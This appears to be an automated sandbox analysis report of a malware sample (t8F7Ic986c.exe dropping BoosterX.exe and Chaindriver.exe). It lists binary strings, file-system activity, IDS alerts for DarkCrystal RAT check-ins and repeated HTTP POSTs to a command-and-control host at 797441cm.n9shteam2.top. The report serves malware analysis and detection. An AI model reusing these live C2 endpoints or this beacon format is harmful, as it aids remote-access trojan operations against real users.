                          Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Tue Apr 6 11:26:02 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.pdb source: Chaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: BoosterX.exe, 00000004.00000000.1662947336.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, BoosterX.exe, 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, Chaindriver.sfx.exe, 00000007.00000000.1672760470.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe, 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe.4.dr, BoosterX.exe.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb## source: _decimal.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652ED8D00 FindFirstFileExW,FindClose,0_2_00007FF652ED8D00
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EF26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF652EF26C4
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C036407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C036407C
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C037B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C037B110
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C038FC20 FindFirstFileExA,4_2_00007FF6C038FC20
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B5B110
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B4407C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6FC20 FindFirstFileExA,7_2_00007FF720B6FC20
                          Source: C:\Chaindriver.exe File opened: C:\Users\user
                          Source: C:\Chaindriver.exe File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Chaindriver.exe File opened: C:\Users\user\AppData
                          Source: C:\Chaindriver.exe File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Chaindriver.exe File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Chaindriver.exe File opened: C:\Users\user\AppData\Local

                          Networking

                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49820 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49788 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49841 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49859 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49809 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49995 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50013 -> 185.158.202.52:80
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50014 -> 185.158.202.52:80
                          Source: Joe Sandbox ViewASN Name: PREVIDER-ASNL PREVIDER-ASNL
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficDNS traffic detected: DNS query: 797441cm.n9shteam2.top
                          Source: unknownHTTP traffic detected: POST /Videouploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 797441cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:42:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Jan 2025 06:43:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
